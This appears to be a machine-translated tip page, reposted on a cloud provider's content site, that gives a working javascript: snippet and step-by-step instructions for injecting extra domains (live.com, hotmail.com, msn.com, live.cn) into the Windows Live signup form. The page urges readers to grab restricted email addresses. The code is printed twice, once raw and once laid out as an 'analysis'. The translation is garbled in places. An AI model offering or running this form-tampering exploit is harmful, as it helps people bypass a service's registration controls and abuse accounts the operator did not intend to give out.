Windows Live @live.com Domain name registration vulnerabilities exploit code _javascript tips

Source: Internet
Author: User
Tags domain registration domain name registration
Another Windows Live @live.com domain Registration vulnerability was found, now we simply through a simple piece of JS code can give Windows Live Registration interface Add @live.com address, it is surprising that the hard to plug in the address can be successfully registered to the account It's another great opportunity, everybody come on together!

Update: Updating code to provide more domain names, including live.cn
The method is simple:

1, enter this page: Http://get.live.com/getlive/overview
2, click the "Register Now" button
3, in the Address bar, paste the code in the following file, and enter:
Copy Code code as follows:

Javascript:function R (q) {} function s (q) {e[q] = new Option (A[q],a[q])}; R (E = document.getElementById ("Idomain"). options); R (d= "Live."); R (A = new Array ("hotmail.com", "hotmail.co.uk", "msn.com", d+ "com", d+ "be", d+ "co.uk", d+ "de", d+ "fr", d+ "it", d+ "NL", d+ " CN ")); for (i=0;i<a.length;i++) {s (i)}alert ("Success-additional domains added!");


After analysis:
Copy Code code as follows:

JavaScript:
Function r (q) {}
Function s (q) {e[q] =& Nbsp;new option (A[q],a[q])};
R (E = document.getelementbyid ("Idomain"). Options);
R (d= "Live.");
R (A = new array ("hotmail.com", "hotmail.co.uk", "msn.com", d+ "com", d+ "be", d+ "co.uk", d+ "de", d+ " Fr ", d+" it ", d+" NL ", d+" cn ");
for  (i=0;i<a.length;i++) {
 s (i )
 }
Alert ("success - additional& Nbsp;domains added! ");

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.